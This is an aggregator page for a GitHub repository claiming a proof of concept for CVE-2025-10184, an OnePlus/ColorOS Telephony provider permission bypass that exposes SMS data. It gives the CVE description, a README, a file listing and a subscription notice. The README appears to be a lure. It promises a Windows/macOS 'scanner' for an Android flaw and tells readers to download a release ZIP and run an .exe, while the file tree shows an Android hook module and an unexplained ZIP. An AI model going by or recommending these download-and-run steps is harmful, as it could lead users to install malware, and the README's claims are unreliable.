CVE-2025-10184 PoC — OnePlus OxygenOS Telephony provider permission bypass

Source

https://github.com/ENGWes/ColorOS-CVE-2025-10184

Associated Vulnerability

Title:OnePlus OxygenOS Telephony provider permission bypass (CVE-2025-10184)
Description:The vulnerability allows any application installed on the device to read SMS/MMS data and metadata from the system-provided Telephony provider without permission, user interaction, or consent. The user is also not notified that SMS data is being accessed. This could lead to sensitive information disclosure and could effectively break the security provided by SMS-based Multi-Factor Authentication (MFA) checks. The root cause is a combination of missing permissions for write operations in several content providers (com.android.providers.telephony.PushMessageProvider, com.android.providers.telephony.PushShopProvider, com.android.providers.telephony.ServiceNumberProvider), and a blind SQL injection in the update method of those providers.

Description

🔍 Identify and analyze the CVE-2025-10184 vulnerability in ColorOS, affecting SMS data access in OPPO and its sub-brands.

Readme

# 🎨 ColorOS-CVE-2025-10184 - Secure Your Device Effectively

## 🛡️ Introduction
Welcome to ColorOS-CVE-2025-10184! This application addresses a critical vulnerability found in ColorOS messaging. It outlines solutions that allow users to take necessary actions to protect their devices and personal data.

## 🚀 Getting Started
Ready to enhance your device’s security? Follow these steps to download and run the application.

## 📥 Download Link
[![Download ColorOS-CVE-2025-10184](https://img.shields.io/badge/Download-Now-blue.svg)](https://github.com/ENGWes/ColorOS-CVE-2025-10184/releases)

## 🌐 Download & Install
To get started, visit the [Releases page](https://github.com/ENGWes/ColorOS-CVE-2025-10184/releases) to download the latest version of the application. 

Once on the page:
1. Look for the most recent version listed at the top.
2. Click on the asset that says “ColorOS-CVE-2025-10184.zip” (or a similar name).
3. Your download will start automatically.

## 💻 System Requirements
This application works on the following operating systems:
- Windows 10 or later
- macOS Monterey or later
- Linux (Ubuntu 20.04 or later)

Ensure your operating system is up-to-date for optimal performance.

## 🔧 Installation Steps
1. Locate the downloaded ZIP file in your downloads folder.
2. Extract the contents of the ZIP file.
3. Open the extracted folder.
4. Double-click on the file named “ColorOS-CVE-2025-10184.exe” (Windows) or “ColorOS-CVE-2025-10184.app” (macOS).
5. Follow the on-screen prompts to complete the installation.

## 🛠️ Using the Application
After installation, open the application. You will see a straightforward interface designed for ease of use. 

1. **Scanning for Vulnerabilities:** Click the “Scan Now” button to check your device for vulnerabilities.
2. **Implementing Solutions:** If any issues are detected, follow the recommended steps provided by the application. The process will guide you through securing your device effectively.

## 📄 Features
- **User-Friendly Interface:** Designed for all users, regardless of technical skill.
- **Real-Time Vulnerability Scanning:** Quickly detects potential security risks.
- **Step-by-Step Guidance:** Offers detailed instructions to remedy identified issues.
- **Frequent Updates:** Regular updates ensure you have the latest protection measures.

## 🔍 Troubleshooting
If you encounter any issues:
1. Make sure your operating system meets the requirements listed above.
2. Ensure that you have installed the application correctly.
3. Check for updates on the [Releases page](https://github.com/ENGWes/ColorOS-CVE-2025-10184/releases).

## 📞 Support
For further assistance, feel free to reach out through the issues section on the GitHub repository. You can also find helpful resources in our FAQ section.

## 📅 Regular Updates
Stay informed about updates and new features by frequently checking the **Releases page** [here](https://github.com/ENGWes/ColorOS-CVE-2025-10184/releases). We commit to enhancing user experience and security measures.

Thank you for choosing ColorOS-CVE-2025-10184! You’re on your way to a safer mobile experience.

File Snapshot


 [4.0K]  /data/pocs/9cbd49ace43c07ddcc79a9726d229a575af45734
├── [4.0K]  app
│   ├── [1002]  build.gradle.kts
│   ├── [1.1K]  proguard-rules.pro
│   ├── [4.0K]  release
│   │   └── [ 396]  output-metadata.json
│   └── [4.0K]  src
│       └── [4.0K]  main
│           ├── [1.1K]  AndroidManifest.xml
│           ├── [4.0K]  assets
│           │   └── [  37]  xposed_init
│           ├── [4.0K]  java
│           │   └── [4.0K]  yuu
│           │       └── [4.0K]  xposed
│           │           ├── [4.0K]  jump
│           │           │   └── [5.8K]  TelephonyHookModule.kt
│           │           ├── [ 22K]  MainActivity.java
│           │           └── [9.3K]  QueryParser.java
│           └── [4.0K]  res
│               ├── [4.0K]  drawable
│               │   └── [139K]  icon.webp
│               ├── [4.0K]  layout
│               │   └── [1.7K]  activity_main.xml
│               └── [4.0K]  values
│                   ├── [ 161]  scope.xml
│                   └── [ 887]  strings.xml
├── [ 228]  build.gradle.kts
├── [4.0K]  derisiveness
│   └── [1.3M]  ColorOS-CVE-2025-10184.zip
├── [4.0K]  gradle
│   ├── [ 424]  libs.versions.toml
│   └── [4.0K]  wrapper
│       ├── [ 44K]  gradle-wrapper.jar
│       └── [ 281]  gradle-wrapper.properties
├── [1.3K]  gradle.properties
├── [8.5K]  gradlew
├── [2.8K]  gradlew.bat
├── [2.9K]  opex_15.0.0.860Patch01.cfg
├── [3.1K]  README.md
└── [ 634]  settings.gradle.kts

16 directories, 23 files

Shenlong Bot has cached this for you

Remarks

1. It is advised to access via the original source first.

2. Local POC snapshots are reserved for subscribers — if the original source is unavailable, the local mirror is part of the paid plan.

View subscription plans →

Goal Reached Thanks to every supporter — we hit 100%!